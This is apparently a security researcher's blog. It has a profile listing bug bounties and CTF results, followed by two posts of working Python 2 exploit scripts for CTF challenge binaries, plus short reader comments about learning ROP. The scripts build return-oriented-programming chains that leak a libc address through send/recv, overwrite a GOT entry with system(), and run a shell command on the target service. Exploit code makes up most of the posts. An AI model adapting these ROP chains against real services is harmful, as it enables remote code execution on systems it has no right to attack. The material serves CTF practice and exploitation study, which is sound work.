Profile 2013. 12. 2. 13:50

Name: 한충우 (Choongwoo Han)

Nickname: tunz

B.S.: Computer Science and Engineering, Technology Management, in UNIST'15

Interests: Software Security, Software Testing, Program Analysis, Web Security

Mail: cwhan.tunz |at| gmail.com

Affiliations:

KAIST SoftWare Testing & Verification (SWTV) Group (2015 ~)

CodeRed(2013 ~ )

UNIST Computer Security Club, HeXA (2011 ~ 2014)

UNIST Mobile Smart Networking (MSN) Lab (2012 ~ 2014)

Best Of the Best (BOB) 2nd class (2013 ~ 2013)

 

Vulnerability Reports

- 2015 Remote Code Execution on GitHub for Mac ($2,500)

- 2015 XSS on GitHub ($1,000)

- 2015 XSS on Dropbox ($1,331).

- 2014 Remote Code Execution on Dr.Soft Netclient5 Patch Management System (KISA 14-084).

- 2014 Remote Code Execution on UNIST portal web site.

- 2013 SQL Injection and breaking of password encryption on UNIST portal web site.

- 2013 SQL Injection on UNIST web mail.

- 2012 Remote Code Execution on UNIST attendance checking devices.


Awards

- 2014 HDCON, 5th place (Silver Prize) (CodeC) (₩2,000,000)

- 2014 Incognito CTF, 2nd place (CodeRed) (₩640,000)

- 2014 DEF CON, Final round (CodeRed)

- 2013 HolyShield, 1st place (CodePink) (₩1,000,000)

- 2013 Korea White hat Contest (Team) 3rd place (Excellence Award) (HeXA) (₩8,000,000)


Talks

- 2015 Naver D2 campus seminar - Security Stories Every Developer Must Know


* If you have anything to ask, please send me an email.

posted by tunz

Reproduced on Ubuntu 13.10



    # Python 2 script
    from socket import *
    from struct import *
    import time

    s = socket(AF_INET, SOCK_STREAM)
    s.connect(('localhost', 7744))

    # Fixed addresses in the target binary
    leaveret = 0x8048a68
    recv_plt = 0x8048770
    send_plt = 0x8048790
    bss = 0x804b080
    fake_ebp = bss+0x50
    send_got = 0x804b070
    ppppr = 0x804906c  # gadget that skips the four arguments of each call

    # Command executed at the end; its output is redirected to fd 4
    cmd = "id>&4\x00"

    # Padding up to the saved return address
    payload = "1;"+"\x00"*(0x66c + 4 - 2)

    # send(4, send_got, 4, 0): leak the resolved address of send()
    payload += pack('<L', send_plt)
    payload += pack('<L', ppppr)
    payload += pack('<L', 4)
    payload += pack('<L', send_got)
    payload += pack('<L', 4)
    payload += pack('<L', 0)

    # recv(4, send_got, 4, 0): overwrite the GOT entry of send()
    payload += pack('<L', recv_plt)
    payload += pack('<L', ppppr)
    payload += pack('<L', 4)
    payload += pack('<L', send_got)
    payload += pack('<L', 4)
    payload += pack('<L', 0)

    # recv(4, bss, len(cmd), 0): store the command string in .bss
    payload += pack('<L', recv_plt)
    payload += pack('<L', ppppr)
    payload += pack('<L', 4)
    payload += pack('<L', bss)
    payload += pack('<L', len(cmd))
    payload += pack('<L', 0)

    # Call through the overwritten GOT entry with bss as the argument
    payload += pack('<L', send_plt)
    payload += "AAAA"
    payload += pack('<L', bss)

    time.sleep(0.5)
    print s.recv(1024)
    s.send("4\n")
    time.sleep(0.5)
    print s.recv(1024)

    # Pause before sending the payload
    raw_input('go?')

    # The first message carries the payload length
    s.send(";"*0x38 + pack('<L',len(payload)))
    time.sleep(1)
    print s.recv(1024)
    s.send(payload)
    time.sleep(1)
    #print s.recv(5)

    #time.sleep(1)
    # Leaked address of send(); system() is computed from the libc offsets
    send_addr = unpack('<L',s.recv(4))[0]
    system_addr = send_addr - 0xf3940 + 0x41260

    print "System: "+hex(system_addr)

    s.send(pack('<L',system_addr))
    s.send(cmd)

    time.sleep(0.1)
    print s.recv(1024)

    s.close()


posted by tunz
  • hea 2013.11.28 23:35

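    Hello, I've also been studying ROP recently. I understand the concept up to calculating offsets and using things like add gadgets, but I don't really know how things like recv and send are used in a remote exploit.. Do you happen to know any good documents on this?

    • tunz 2013.11.29 01:58

      Hmm... I didn't study from just one document either, so
      if you analyze one simple CTF exploit while knowing exactly what the GOT and PLT are, you'll get the feel for it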

Reproduced on Ubuntu 12.04


    # Python 2 script
    from socket import *
    from struct import *
    import time

    # Fixed addresses in the target binary
    fputs_plt = 0x8048800
    fputs_got = 0x804B064
    recv_plt = 0x8048810
    send_plt = 0x8048830
    ppppr = 0x80499FC  # gadget that skips the four arguments of each call
    bss = 0x804c0dc

    # Command executed at the end; its output is redirected to fd 4
    cmd = "id>&4\x00"

    # Retry with a new connection until the output contains "uid"
    i=0
    while True:
        print "Send! %d" % i
        i += 1
        s = socket(AF_INET, SOCK_STREAM)

        s.connect(('localhost',8080))

        time.sleep(0.3)
        print s.recv(10000)

        #raw_input('go?')

        vmcode = ""

        # auth 2
        vmcode += "#\x00\x00\x00\x00"*1024 # index + 4*
        vmcode += ("P\x10"+"$\x08")*8 # get secret
        vmcode += "P\x10"
        vmcode += "9R"

        # auth 3
        vmcode += "\x91"
        vmcode += pack('<L',0xdeadbeef)*2

        # overflow
        vmcode += "\xef"

        vmcode += "A"*0x20

        # ROP
        # send(4, fputs_got, 4, 0): leak the resolved address of fputs()
        vmcode += pack('<L',send_plt)
        vmcode += pack('<L',ppppr)
        vmcode += pack('<L',4)
        vmcode += pack('<L',fputs_got)
        vmcode += pack('<L',4)
        vmcode += pack('<L',0)

        # recv(4, fputs_got, 4, 0): overwrite the GOT entry of fputs()
        vmcode += pack('<L',recv_plt)
        vmcode += pack('<L',ppppr)
        vmcode += pack('<L',4)
        vmcode += pack('<L',fputs_got)
        vmcode += pack('<L',4)
        vmcode += pack('<L',0)

        # recv(4, bss, len(cmd), 0): store the command string in .bss
        vmcode += pack('<L',recv_plt)
        vmcode += pack('<L',ppppr)
        vmcode += pack('<L',4)
        vmcode += pack('<L',bss)
        vmcode += pack('<L',len(cmd))
        vmcode += pack('<L',0)

        # Call through the overwritten GOT entry with bss as the argument
        vmcode += pack('<L',fputs_plt)
        vmcode += "AAAA"
        vmcode += pack('<L',bss)

        # Pad the message to 0x400*6 bytes
        s.send(vmcode + " "*(0x400*6 - len(vmcode)))

        try:
            fputs_addr = unpack('<L',s.recv(4))[0]
        except Exception:
            # No 4-byte leak came back on this attempt: close and retry
            s.close()
            continue
        # system() is computed from the libc offsets of fputs and system
        system_addr = fputs_addr - 0x66100 + 0x3f430
        print "System: "+hex(system_addr)

        s.send(pack('<L',system_addr))

        s.send(cmd)

        out = s.recv(65000)
        if "uid" in out:
            print out
            break

        s.close()


posted by tunz
  • xeros 2014.02.06 18:37

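    I'd appreciate it if you could upload the files for the two secuinside 2013 problems, haha

  • xeros 2014.02.09 19:48

    Oh.. they were there.. I guess I didn't notice because they were at the very bottom.. Thank you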